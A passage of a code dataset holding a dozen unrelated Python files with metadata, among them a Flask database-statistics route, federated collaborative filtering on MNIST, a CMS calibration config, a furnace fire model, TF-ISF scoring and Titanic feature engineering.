cnx = mysql.connector.connect(user=secret_config.user, password=secret_config.password,\n host=secret_config.host, database=secret_config.database)\n cursor = cnx.cursor()\n cursor.execute(\"SELECT Text FROM Reposts\")\n data = []\n cnt_empty = 0\n for (Text) in cursor:\n data.append(len(Text[0]))\n if len(Text[0]) == 0:\n cnt_empty += 1\n cnx.close()\n return render_template(\"index.html\", cnt=len(data), avg_text=mean(data), md_text=mode(data), d_text=variance(data),\n min_text=min(data), max_text=max(data),\n with_text=len(data) - cnt_empty, no_text=cnt_empty)\n\n\napp.run(debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"73808033","text":"from anomalydetection import anomalyDetect, getAvgInteractionForceSum\n\n# These are a few individual tests that might be interesting to show off\n\nif __name__ == '__main__':\n # Tests\n\n # UMN\n L = 12\n anomalyDetect('UMN/Splitted/Crowd-Activity-All_1.mp4', '.mp4', L, True, 450, vidFile=True)\n anomalyDetect('UMN/Splitted/Crowd-Activity-All_3.mp4', '.mp4', L, True, 360, vidFile=True)\n anomalyDetect('UMN/Splitted/Crowd-Activity-All_9.mp4', '.mp4', L, True, 450, vidFile=True)\n\n # UCSD Ped 2\n L = 12\n refForce = getAvgInteractionForceSum('UCSDped2/Train/Train002/', '.tif', L)\n anomalyDetect('UCSDped2/Test/Test006/', '.tif', L, True, refForce, 1.1)\n anomalyDetect('UCSDped2/Test/Test002/', '.tif', L, True, refForce, 1.1)\n anomalyDetect('UCSDped2/Test/Test008/', '.tif', L, True, refForce, 1.1)\n\n # UCSD Ped 1\n L = 10\n refForce = getAvgInteractionForceSum('UCSDped1/Train/Train001/', '.tif', L)\n anomalyDetect('UCSDped1/Test/Test032/', '.tif', L, True, refForce)\n anomalyDetect('UCSDped1/Test/Test002/', '.tif', L, True, refForce)","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"555036999","text":"# Execute Federated Collaborative Filtering\nfrom FedCF import *\nfrom torchvision import datasets, transforms\nimport torch\nimport numpy as np\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"3\"\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef load_data():\n # data sets\n data = []\n for i in range(1, 7):\n #d = np.load(\"/home/jyfan/data/bank/non-iid/3clients/bank\" + str(i) + \".npy\")\n d = np.load(\"/home/jyfan/data/bank/non-iid/bank\" + str(i) + \".npy\")\n data.append((d[:, :16], d[:, 16:].flatten()))\n return data\n\n\ndef load_mnist():\n data_train = datasets.MNIST(root=\"~/data/\", train=True, transform=transforms.ToTensor())\n data_test = datasets.MNIST(root=\"~/data/\", train=False, transform=transforms.ToTensor())\n # split MNIST (training set) into non-iid data sets\n non_iid = []\n for i in range(0, 10):\n idx = np.where(data_train.targets == i)\n d = data_train.data[idx].flatten(1).float() / 255.0\n targets = data_train.targets[idx].float()\n non_iid.append((d, targets))\n non_iid.append((data_test.data.flatten(1).float() / 255.0, data_test.targets.float()))\n return non_iid\n\ndef mnist_svd(l):\n d = load_mnist()\n par = {\n 'client_num': 100,\n 'data': d,\n 'device': device,\n 'lr': 1,\n 'server_lr': 1,\n 'latent': 28,\n 'lambda': l\n }\n FedCF = FederatedCF(par)\n for i in range(30):\n FedCF.global_update()\n rmse = FedCF.global_rmse()\n print(\"global epochs = {:d}, rmse = {:.4f}\".format(i+1, rmse))\n FedCF.save_user_item_factor()\n\n\ndef svd_test_set(Q, epoch, lr, _lambda):\n \"\"\" Matrix Factorization for test set \"\"\"\n test_set = datasets.MNIST(root=\"~/data/\", train=False, transform=transforms.ToTensor())\n data = test_set.data.flatten(1).float() / 255.0\n CF = MatrixFactorization(data, Q, epoch, lr, _lambda, device).to(device)\n CF.update()\n test_label = np.array(test_set.targets.float())\n np.save(\"/home/jyfan/data/MNIST/non-iid-p/\" + str(Q.shape[0]) + \"/test_label.npy\", test_label)\n CF.save_user_item()\n\n\nif __name__ == '__main__':\n import warnings\n warnings.filterwarnings(\"ignore\")\n l = 1e-7\n #mnist_svd(l)\n Q = np.load(\"/home/jyfan/data/MNIST/Q_10.npy\")\n svd_test_set(torch.tensor(Q), epoch=30, lr=1, _lambda=l)\n\n\n\n\n","sub_path":"FedCF/run_FedCF.py","file_name":"run_FedCF.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"22804465","text":"\r\n\r\ndef knn(trainset:list, trainlabel:list, testset:list, testlabel:list, k:int):\r\n print(\"# knn. trainsize:%d, testsize:%d.\" % (len(trainset), len(testset)))\r\n classes = list(set(trainlabel))\r\n predict_label = list()\r\n elem_count = 0\r\n for test_elem in testset:\r\n elem_count += 1\r\n if (elem_count % 50 == 0):\r\n print_progress(elem_count, len(testlabel))\r\n label = knn_core(test_elem, trainset, trainlabel, k)\r\n predict_label.append(label)\r\n Accuracy, MacroF1, MicroF1 = evaluate.evaluate(classes, testlabel, predict_label)\r\n return predict_label, Accuracy, MacroF1, MicroF1\r\n\r\n","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"531138852","text":"\"\"\"\nGiven a linked list, remove all consecutive nodes that sum to zero. Print out the remaining nodes.\n\nFor example, suppose you are given the input 3 -> 4 -> -7 -> 5 -> -6 -> 6. In this case, \nyou should first remove 3 -> 4 -> -7, then -6 -> 6, leaving only 5.\n\"\"\"\n\n\nclass Node:\n\n def __init__(self,value):\n self.value = value\n self.next = None\n\n\ndef removeAllConsecutiveNode(head):\n return None\n\n\n\n\n\nif __name__ == \"__main__\":\n node1 = Node(3)\n node2 = Node(4)\n node3 = Node(-7)\n node4 = Node(5)\n node5 = Node(-6)\n node6 = Node(6)\n\n node1.next = node2\n node2.next = node3\n node3.next = node4\n node4.next = node5\n node5.next = node6\n\n","sub_path":"Old/Anything/removeAllConsecutiveNodes.py","file_name":"removeAllConsecutiveNodes.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"255692160","text":"import FWCore.ParameterSet.Config as cms\n\nfrom Configuration.Eras.Era_Run2_2018_cff import Run2_2018\nprocess = cms.Process(\"ANALYSIS\",Run2_2018)\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load(\"Configuration.StandardSequences.GeometryRecoDB_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\nprocess.load(\"RecoLocalCalo.EcalRecAlgos.EcalSeverityLevelESProducer_cfi\")\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nfrom Configuration.AlCa.autoCond import autoCond\nprocess.GlobalTag.globaltag=autoCond['run2_data']\n\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(1000)\nif 'MessageLogger' in process.__dict__:\n process.MessageLogger.HcalIsoTrackX=dict()\n process.MessageLogger.HcalIsoTrack=dict()\n\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )\n\nprocess.load('RecoLocalCalo.CaloTowersCreator.calotowermaker_cfi')\nprocess.towerMakerAll = process.calotowermaker.clone()\nprocess.towerMakerAll.hbheInput = cms.InputTag(\"hbhereco\")\nprocess.towerMakerAll.hoInput = cms.InputTag(\"none\")\nprocess.towerMakerAll.hfInput = cms.InputTag(\"none\")\nprocess.towerMakerAll.ecalInputs = cms.VInputTag(cms.InputTag(\"ecalRecHit\",\"EcalRecHitsEB\"), cms.InputTag(\"ecalRecHit\",\"EcalRecHitsEE\"))\nprocess.towerMakerAll.AllowMissingInputs = True\n\nprocess.load('Calibration.HcalCalibAlgos.hcalIsoTrkAnalyzer_cff')\nprocess.hcalIsoTrkAnalyzer.triggers = []\nprocess.hcalIsoTrkAnalyzer.useRaw = 0 # 1 for Raw\nprocess.hcalIsoTrkAnalyzer.ignoreTriggers = True\nprocess.hcalIsoTrkAnalyzer.debugEvents = [640818633, 640797426, 641251898,\n 641261804, 641172007, 641031809]\n\nprocess.source = cms.Source(\"PoolSource\", \n fileNames = cms.untracked.vstring('file:oldPoolOutput.root')\n)\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('output_oldalca.root')\n)\n\nprocess.p = cms.Path(process.hcalIsoTrkAnalyzer)\n\n","sub_path":"Calibration/HcalCalibAlgos/test/python/isoTrackAlCaAnalysis_cfg.py","file_name":"isoTrackAlCaAnalysis_cfg.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"124610206","text":"# Link: https://leetcode.com/problems/unique-email-addresses/\nclass Solution:\n def numUniqueEmails(self, emails):\n \"\"\"\n :type emails: List[str]\n :rtype: int\n \"\"\"\n result = set()\n for email in emails:\n local, ex, domain = email.partition('@')\n if '+' in local:\n # 截取到+\n local = local[:local.index('+')]\n result.add(local.replace('.','') + '@' + domain)\n return len(result)\n\n","sub_path":"leetcode/easy/Unique Email Addresses.py","file_name":"Unique Email Addresses.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"337363807","text":"import math\nimport decimal\n\ndef tf_isf(m_d):\n # main dictionary with key: sentId and value is a list of words ( Eg: key = 1.1 , value = ['hi,'hello'])\n main_dict = {}\n for k,v in m_d.items():\n main_dict[k] = v.split()\n tfFinalList = []\n df_dictionary = {}\n idf_dictionary = {}\n doc_sent_count = []\n doc_count = 0\n sent_ids=[]\n iteration = 0\n n_sentences = 0\n tf_per_sent_list = []\n idlst = []\n compare_list = ['1.1','2.1','3.1','4.1','5.1','6.1','7.1','8.1','9.1','10.1','11.1','12.1','13.1','14.1','15.1','16.1','17.1','18.1','19.1','20.1']#,'22.1','23.1','24.1','25.1']\n for k, v in main_dict.items():\n if k == '1.1':\n tf_per_sent_list = []\n iteration = iteration + 1\n n_sentences = 0\n idlst=[]\n elif k == compare_list[iteration+1]: # a new article is encountered\n sent_ids.append(idlst)#sentence ids\n tfFinalList.append(tf_per_sent_list)\n doc_sent_count.append(n_sentences)\n tf_per_sent_list = []\n iteration = iteration + 1\n n_sentences = 0\n idlst=[]\n idlst.append(k)\n n_sentences = n_sentences + 1\n tf_sent_dict = {}\n for keyword in v:\n if keyword in tf_sent_dict:\n tf_sent_dict[keyword] = tf_sent_dict[keyword] + 1\n else:\n tf_sent_dict.update({keyword:1})\n tf_per_sent_list.append(tf_sent_dict)\n\n sent_ids.append(idlst)#sentence ids # for the last set of documents\n tfFinalList.append(tf_per_sent_list)# for the last set of documents\n doc_sent_count.append(n_sentences)# for the last set of documents\n\n for sent_list in tfFinalList:\n for dicts in sent_list:\n maxtf = 0\n for w in dicts:\n if dicts[w] > maxtf:\n maxtf = dicts[w]\n for w in dicts:\n dicts[w] = dicts[w] / float(maxtf)\n\n sf_list = []\n\n for sent_list in tfFinalList:\n sf = {}\n for dicts in sent_list:\n for w in dicts:\n if w in sf:\n sf[w] = sf[w] + 1\n else:\n sf.update({w:1})\n sf_list.append(sf)\n\n isf_list = []\n\n id = 0\n for dict1 in sf_list:\n isf_dict = {}\n for w in dict1:\n isf = 0.0\n val1 = doc_sent_count[id] / float(1 + dict1[w])\n if val1 > 0:\n isf = math.log(val1 , 10)\n\n isf_dict.update({w:isf})\n id = id + 1\n isf_list.append(isf_dict)\n\n\n id = 0\n for doc in tfFinalList:\n for sentdic in doc:\n for w in sentdic:\n isf_dict = isf_list[id]\n if w in isf_dict:\n sentdic[w] = sentdic[w] * isf_dict[w]\n else:\n sentdic[w] = 0\n id = id + 1\n\n ans={}\n for i,doc in enumerate(tfFinalList):\n for j,sent in enumerate(doc):\n score=0.0\n l=len(sent)+1\n for key in sent.keys():\n score+=sent[key] # add tf_isf of words\n score/=(l*1.0)\n #ans[sent_ids[i][j]]=round(decimal.Decimal(score),4)\n ans[sent_ids[i][j]] = round(score, 4)\n\n return ans #sent-id : normalized total tf_isf score\n","sub_path":"tf_isf.py","file_name":"tf_isf.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82501411","text":"log_file = open(\"log.txt\", \"w\")\r\n\r\nname = [\"Kelly\",\"Jason\",\"Alice\",\"Debra\",\"Gordon\"]\r\nuser_ID = [1,2,3,4,5]\r\npay_Type = [\"Hourly\",\"Salary\",\"Salary\",\"Hourly\",\"Hourly\"]\r\npay_Rate = [12,700,720,13,12]\r\nhours_Worked = [32,40,40,19,23]\r\ngross_Pay=[]\r\n\r\nlog_file.write(\"name\\tuser_ID\\tpay_Type\\tpay_Rate\\thours_Worked\\tgross_Pay\\n\")\r\n\r\nprint(\"name\\tuser_ID\\tpay_Type\\tpay_Rate\\thours_Worked\\tgross_Pay\\n\")\r\n\r\nfor i in range(0,5):\r\n\r\n #set the file entry\r\n entry = str(name) + \"\\t\" + str(user_ID) + \"\\t\" + str(pay_Type) + \"\\t\" + str(pay_Rate) + \"\\t\" + str(hours_Worked) + \"\\t\" + str(gross_Pay) + \"\\n\"\r\n\r\n #write the file entry\r\n log_file.write(entry)\r\n\r\n print(entry,end='')\r\n\r\nlog_file.close()\r\n","sub_path":"Test 3.py","file_name":"Test 3.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"363476073","text":"# -*- coding: utf-8 -*-\nimport time\nfrom CALCS.FurnaceModel import *\nfrom CTS.CTS import write_list_to_csv as write_data\nfrom CTS.CTS import PlotScatter2D\nimport re\n\nversion = \"0.08\"\ntime_epoch = 1483228800\n\nif __name__ == \"__main__\":\n print(\"Start - Furnace Model (text) v\" + version)\n time_start = time.time()\n\n # ============================================== PARSE INPUT DATA ==================================================\n print(\"Parsing data...\")\n # Read input text\n with open(\"input_parameters.txt\") as input_file:\n input_text = input_file.read()\n\n # remove spaces\n input_text = input_text.replace(\" \", \"\")\n\n # break raw input text to a list\n input_text = re.split(';|\\r|\\n', input_text)\n\n # delete comments (anything followed by #)\n input_text = [v.split(\"#\")[0] for v in input_text]\n\n # delete empty entries\n input_text = [v for v in input_text if v]\n\n # for each entry in the list (input_text), break up i.e. [\"variable_name=1+1\"] to [[\"variable_name\"], [\"1+1\"]]\n input_text = [v.split(\"=\") for v in input_text]\n\n # transform the list (input_text) to a dictionary. i.e. [[\"variable_name\"], [\"1+1\"]] to {\"variable_name\": 2}\n input_text_dict = {v[0]: eval(v[1]) for v in input_text}\n\n # clean intermediate variables\n del input_file, input_text\n\n # =============================================== RUN CALCULATION ==================================================\n print(\"Starting the simulation...\")\n results_dict = main_function(\n time_step=input_text_dict[\"time_step\"],\n time_cap=input_text_dict[\"time_cap\"],\n gas_emissivity=input_text_dict[\"gas_emissivity\"],\n ventilation_excess_modifier=input_text_dict[\"ventilation_excess_modifier\"],\n fuel_material=input_text_dict[\"fuel_material\"],\n fuel_density=input_text_dict[\"fuel_density\"],\n specimen_surface_emissivity=input_text_dict[\"specimen_surface_emissivity\"],\n specimen_exposed_area=input_text_dict[\"specimen_exposed_area\"],\n specimen_thickness=input_text_dict[\"specimen_thickness\"],\n specimen_heat_of_combustion=input_text_dict[\"specimen_heat_of_combustion\"],\n specimen_density=input_text_dict[\"specimen_density\"],\n specimen_moisture_content=input_text_dict[\"specimen_moisture_content\"],\n lining_surface_emissivity=input_text_dict[\"lining_surface_emissivity\"],\n lining_surface_area=input_text_dict[\"lining_surface_area\"],\n lining_thickness=input_text_dict[\"lining_thickness\"],\n lining_density=input_text_dict[\"lining_density\"],\n lining_specific_heat=input_text_dict[\"lining_specific_heat\"],\n window_area=input_text_dict[\"window_area\"]\n )\n\n time_end = time.time()\n # ============================================= SAVE NUMERICAL DATA ================================================\n print(\"Saving numerical data...\")\n data_numerical = output_numerical(results_dict)\n write_data(\"outputs/data.csv\", data_numerical)\n\n # ============================================ PLOT AND SAVE FIGURES ===============================================\n print(\"Saving plots...\")\n # default values\n x = results_dict[\"time\"] / 60.\n default_format = {\n \"mark_every\":len(results_dict[\"time\"])/10,\n \"figure_size_scale\":0,\n \"marker_size\":4,\n \"axis_label_x\":\"Time [$min$]\",\n \"axis_lim_x\":[0, max(x)],\n }\n\n # temperature ------------------------------------------------------------------------------------------------------\n xyl = [\n [x, results_dict[\"temperature gas\"], \"Gas temperature\"]\n ]\n for i,v in enumerate(results_dict[\"temperature lining\"]):\n xyl.append([x, v, \"Lining temp. \" + str(i)])\n\n fig_temperature_lining = PlotScatter2D()\n fig_temperature_lining.plot(xyl)\n fig_temperature_lining.format(\n axis_label_y1=\"Temperature [$\\degree C$]\",\n **default_format\n )\n fig_temperature_lining.update_format_line(\"Gas temperature\", marker=None, color=\"grey\")\n fig_temperature_lining.update_legend()\n fig_temperature_lining.save_figure(figure_name=\"outputs/temperature (lining)\")\n\n # Plot gas and specimen temperature --------------------------------------------------------------------------------\n fig_temperature_specimen = PlotScatter2D()\n xyl = [\n [x, results_dict[\"temperature gas\"], \"Gas temperature\"]\n ]\n for i,v in enumerate(results_dict[\"temperature specimen\"]):\n xyl.append([x, v, \"Specimen temp. \" + str(i)])\n\n fig_temperature_specimen.plot(xyl)\n fig_temperature_specimen.format(\n axis_label_y1=\"Temperature [$\\degree C$]\",\n **default_format\n )\n fig_temperature_specimen.update_format_line(\"Gas temperature\", marker=None, color=\"grey\")\n fig_temperature_specimen.update_legend()\n\n # Plot energy rate of via lining, ventilation ----------------------------------------------------------------------\n fig_hr = PlotScatter2D()\n xyl = [\n [x, results_dict[\"heat rate ventilation\"] / 1.e6, \"Heat rate due to ventilation\"],\n [x, results_dict[\"heat rate window radiation\"] / 1.e6, \"Heat rate due to window\"],\n [x, results_dict[\"heat rate lining\"] / 1.e6, \"Heat rate due to lining\"],\n [x, results_dict[\"heat rate specimen combustion\"] / 1.e6, \"Heat rate due to specimen combustion\"],\n [x, results_dict[\"heat rate specimen (loss)\"] / 1.e6, \"Heat rate due to specimen (loss)\"],\n [x, results_dict[\"heat rate burner combustion\"] / 1.e6, \"Heat rate due to burner\"]\n ]\n fig_hr.plot(xyl)\n fig_hr.format(\n axis_label_y1=\"Heat rate [$MJ\\\\ s^{-1}$]\",\n **default_format\n )\n fig_hr.format_legend(legend_loc=7)\n # fig_hr.axes[0].plot([0, max(x)], [0, 0], color=\"black\")\n\n # plot mass rate of ventilation, fuel inlet and specimen burning ---------------------------------------------------\n fig_mass_rate = PlotScatter2D()\n xyl = [\n [x, results_dict[\"mass rate fuel\"], \"Mass burning rate of fuel\"],\n [x, results_dict[\"mass rate specimen\"], \"Mass burning rate of specimen\"],\n [x, results_dict[\"mass rate ventilation in\"], \"Mass flow rate of ventilation (inlet)\"],\n [x, results_dict[\"mass rate ventilation out\"], \"Mass flow rate of ventilation (outlet)\"]\n ]\n fig_mass_rate.plot(xyl)\n fig_mass_rate.format(\n axis_label_y1=\"Mass rate [$kg\\\\ s^{-1}$]\",\n **default_format\n )\n fig_mass_rate.update_legend()\n # figure3.axes[1].plot([0, max(x)], [0, 0], color=\"black\")\n\n # plot volumetric flow rate ----------------------------------------------------------------------------------------\n fig_volumetric = PlotScatter2D()\n xyl = [\n [x, results_dict[\"volumetric rate ventilation in\"], \"Vol. flow rate of ventilation (inlet)\"],\n [x, results_dict[\"volumetric rate ventilation out\"], \"Vol. flow rate of ventilation (outlet)\"],\n [x, results_dict[\"volumetric_fuel\"], \"Vol. flow rate of fuel\"]\n ]\n fig_volumetric.plot(xyl)\n fig_volumetric.format(\n axis_label_y1=\"Volumetric flow rate [$m^{3}\\\\ s^{-1}$]\",\n **default_format\n )\n fig_volumetric.update_legend()\n # fig_volumetric.axes[1].plot([0, max(x)], [0, 0], color=\"black\")\n\n # plot specific heat of materials ----------------------------------------------------------------------------------\n fig_specific_heat = PlotScatter2D()\n xyl = [\n [x, results_dict[\"specific heat ventilation out\"], \"Specific heat (weighted average)\"],\n [x, results_dict[\"specific heat o2 out\"], \"Specific heat of $O_2$\"],\n [x, results_dict[\"specific heat co2 out\"], \"Specific heat of $CO_2$\"],\n [x, results_dict[\"specific heat n2 out\"], \"Specific heat of $N_2$\"],\n [x, results_dict[\"specific heat ar out\"], \"Specific heat of $Ar$\"],\n [x, results_dict[\"specific heat h2o out\"], \"Specific heat of $H_2O$\"]\n ]\n fig_specific_heat.plot(xyl)\n fig_specific_heat.format(\n axis_label_y1 = \"Specific heat [$MJ\\\\ kg^{-1}\\\\ K^{-1}$]\",\n **default_format\n )\n fig_specific_heat.update_legend()\n # fig_specific_heat.axes[0].plot([0, max(x)], [0, 0], color=\"black\")\n\n # plot heat rate of different species in outlet ventilation --------------------------------------------------------\n fig_hr_species = PlotScatter2D()\n xyl = [\n [x, results_dict[\"heat rate n2\"]/1.e6, \"Heat rate via $N_2$\"],\n [x, results_dict[\"heat rate o2\"]/1.e6, \"Heat rate via $O_2$\"],\n [x, results_dict[\"heat rate co2\"]/1.e6, \"Heat rate via $CO_2$\"],\n [x, results_dict[\"heat rate ar\"]/1.e6, \"Heat rate via $Ar$\"],\n [x, results_dict[\"heat rate h2o\"]/1.e6, \"Heat rate via $H_2O$\"],\n ]\n fig_hr_species.plot(xyl)\n fig_hr_species.format(\n axis_label_y1 = \"Heat rate [$MJ\\\\ s^{-1}$]\",\n **default_format\n )\n fig_hr_species.update_legend()\n # fig_hr_species.axes[1].plot([0, max(x)], [0, 0], color=\"black\")\n\n # charring rate ----------------------------------------------------------------------------------------------------\n fig_length_charring = PlotScatter2D()\n xyl=[\n [x, results_dict[\"length_specimen_charring\"] * 60000, \"Charring rate\"] # convert from [m/s] to [mm/min]\n ]\n fig_length_charring.plot(xyl)\n fig_length_charring.format(\n axis_label_y1 = \"Charring rate [$mm\\\\ min^{-1}$]\",\n **default_format\n )\n fig_length_charring.update_legend()\n\n # furnace temperature and internal total heat flux -----------------------------------------------------------------\n fig_heat_flux = PlotScatter2D()\n xyl = [\n [x, results_dict[\"hf_furnace\"], \"Furnace heat flux (instantaneous)\"],\n [x, results_dict[\"hf_furnace_average\"], \"Furnace heat flux (average)\"]\n ]\n xyl2 = [\n [x, results_dict[\"temperature gas\"], \"Gas temperature\"]\n ]\n fig_heat_flux.plot(xyl1=xyl,xyl2=xyl2)\n fig_heat_flux.format(\n axis_label_y1 = \"Heat flux [$W\\\\ m^{-2}$]\",\n axis_label_y2 = \"Temperature [$\\degree C$]\",\n **default_format\n )\n fig_heat_flux.update_legend()\n\n # O2 content within the furnace ------------------------------------------------------------------------------------\n fig_o2_content = PlotScatter2D()\n xyl = [\n [x, results_dict[\"content_volume_o2_furnace\"], \"Furnace oxygen content\"]\n ]\n fig_o2_content.plot(xyl1=xyl)\n fig_o2_content.format(\n axis_label_y1 = \"Content [$\\%\\\\ m^{3}\\\\ m^{-3}$]\",\n **default_format\n )\n fig_o2_content.update_legend()\n\n # ==================================================== FINISH ======================================================\n print(\"End - Furnace Model v\" + version)\n print(\"Total running time: \" + str(int(time_end-time_start)) + \" seconds.\")\n\n # finishing\n fig_hr.save_figure(figure_name=\"outputs/heat rate\")\n fig_mass_rate.save_figure(figure_name=\"outputs/mass rate\")\n fig_specific_heat.save_figure(figure_name=\"outputs/specific heat\")\n fig_hr_species.save_figure(figure_name=\"outputs/heat rate (ventilation species)\")\n fig_temperature_specimen.save_figure(figure_name=\"outputs/temperature (specimen)\")\n fig_volumetric.save_figure(figure_name=\"outputs/volumetric\")\n fig_length_charring.save_figure(figure_name=\"outputs/charring rate\")\n fig_heat_flux.save_figure(figure_name=\"outputs/heat flux\")\n fig_o2_content.save_figure(figure_name=\"outputs/content o2\")\n # figure1.figure.show()\n # figure2.figure.show()\n # figure3.figure.show()\n # figure4.figure.show()\n # figure5.figure.show()\n # figure6.figure.show()\n # raw_input(\"Press any key to finish.\")\n","sub_path":"main_text.py","file_name":"main_text.py","file_ext":"py","file_size_in_byte":11647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"181829957","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 01 15:22:43 2017\r\n\r\n@author: estabror\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n#%matplotlib inline\r\n\r\ndf = pd.read_excel('H:/Desktop/Spec_Tracker.xlsx', sheetname='Combined',\r\n skiprows=2)\r\ndropcols = ['blank', 'Unnamed: 24']\r\ndf = df.drop(dropcols,axis=1)\r\ndf = df.rename(columns={'Yield.1':'YB_Yield', 'WAL.1':'YB_WAL',\r\n 'Orig ($000)':'Orig', 'Current ($000)':'Current'})\r\n \r\n#mtg_rates = pd.read_excel('H:/Desktop/banx_mtg_rates-112916.xlsx')\r\n#mtg_rates.set_index('Date', inplace=True)\r\n\r\n\r\ndef lb_lineplot(program, coupon, lbtype):\r\n \"\"\" draw line graph for loan balance products from data in df dataframe \"\"\"\r\n\r\n valid_program = ['FNCI','FGCI','FNCT','FGTW','FNCN']\r\n valid_lbtype = ['LLB','MLB','HLB','HHLB']\r\n \r\n if program not in valid_program:\r\n return str('Bad program type')\r\n \r\n if lbtype not in valid_lbtype:\r\n return str('Bad loan balance type')\r\n\r\n if lbtype == 'LLB':\r\n low = df.MaxLS>=0\r\n high = df.MaxLS<=85000\r\n elif lbtype == 'MLB':\r\n low = df.MaxLS>85000\r\n high = df.MaxLS<=110000\r\n elif lbtype == 'HLB':\r\n low = df.MaxLS>110000\r\n high = df.MaxLS<=150000\r\n elif lbtype == 'HHLB':\r\n low = df.MaxLS>150000\r\n high = df.MaxLS<=175000\r\n else:\r\n low = 0\r\n high = 9999999\r\n\r\n ldata = df[(low) & (high) & (df.Type == program) & (df.Cpn == coupon)]\r\n x = ldata.groupby('Offer Date')\r\n y = x['Decimal Payup'].aggregate(np.mean)*32\r\n \r\n y = y.to_frame()\r\n \r\n figname = program+lbtype+str(coupon)\r\n fig, ax = plt.subplots()\r\n ax.plot(y,'b')\r\n ax.set_ylabel('Payup')\r\n ax.set_title(lbtype + \" \" +program + \" \" + str(coupon) + \\\r\n ' :Payup to TBA in ticks')\r\n fig.autofmt_xdate() \r\n ax.grid()\r\n return fig.savefig('H:/Desktop/pythonfiles/pix/' + figname + '.png')\r\n\r\n \r\n\r\n\r\n \r\n \r\n","sub_path":"payup_function_updated.py","file_name":"payup_function_updated.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"177230209","text":"import pandas as pd\r\nimport os\r\nimport numpy as np\r\nfrom sklearn import tree, ensemble, model_selection, preprocessing\r\nimport xgboost as xgb\r\nimport seaborn as sns\r\n\r\ndir = 'E:/'\r\ntitanic_train = pd.read_csv(os.path.join(dir, 'train.csv'))\r\nprint(titanic_train.info())\r\nprint(titanic_train.columns)\r\n\r\nfrom sklearn.impute import SimpleImputer\r\nage_imputer = SimpleImputer(missing_values=np.nan, strategy='mean')\r\ntitanic_train['Age_imputed'] =age_imputer.fit_transform(titanic_train[['Age']]) \r\n\r\nfare_imputer = SimpleImputer(missing_values=np.nan, strategy='mean')\r\nfare_imputer.fit(titanic_train[['Fare']]) \r\n\r\nsns.countplot(x='Embarked',data=titanic_train)\r\ntitanic_train.loc[titanic_train['Embarked'].isnull(), 'Embarked'] = 'S'\r\n\r\nsns.countplot(x='SibSp', data=titanic_train)\r\nsns.distplot(titanic_train['SibSp'], hist=False)\r\nsns.boxplot(x='SibSp',data=titanic_train)\r\nsns.FacetGrid(titanic_train, hue=\"Survived\",size=8).map(sns.kdeplot, \"SibSp\").add_legend()\r\n\r\nsns.countplot(x='Parch', data=titanic_train)\r\nsns.distplot(titanic_train['Parch'], hist=False)\r\nsns.boxplot(x='Parch',data=titanic_train)\r\nsns.FacetGrid(titanic_train, hue=\"Survived\",size=8).map(sns.kdeplot, \"Parch\").add_legend()\r\n\r\nsex_encoder = preprocessing.LabelEncoder()\r\nsex_encoder.fit(titanic_train['Sex'])\r\ntitanic_train['Sex_encoded'] = sex_encoder.transform(titanic_train['Sex'])\r\n\r\npclass_encoder = preprocessing.LabelEncoder()\r\npclass_encoder.fit(titanic_train['Pclass'])\r\ntitanic_train['Pclass_encoded'] = pclass_encoder.transform(titanic_train['Pclass'])\r\n\r\nemb_encoder = preprocessing.LabelEncoder()\r\nemb_encoder.fit(titanic_train['Embarked'])\r\ntitanic_train['Embarked_encoded'] = emb_encoder.transform(titanic_train['Embarked'])\r\n\r\n#create title feature from name\r\ndef extract_title(name):\r\n return name.split(',')[1].split('.')[0].strip()\r\ntitanic_train['Title'] = titanic_train['Name'].map(extract_title)\r\nsns.factorplot(x=\"Title\", hue=\"Survived\", data=titanic_train, kind=\"count\", size=6)\r\n\r\ntitle_encoder = preprocessing.LabelEncoder()\r\ntitle_encoder.fit(titanic_train['Title'])\r\ntitanic_train['Title_encoded'] = title_encoder.transform(titanic_train['Title'])\r\n\r\n#create family size feature from sibsp, parch\r\ntitanic_train['FamilySize'] = titanic_train['SibSp'] + titanic_train['Parch'] + 1\r\nsns.FacetGrid(titanic_train, hue=\"Survived\",size=8).map(sns.kdeplot, \"FamilySize\").add_legend()\r\n\r\n#create family group feature 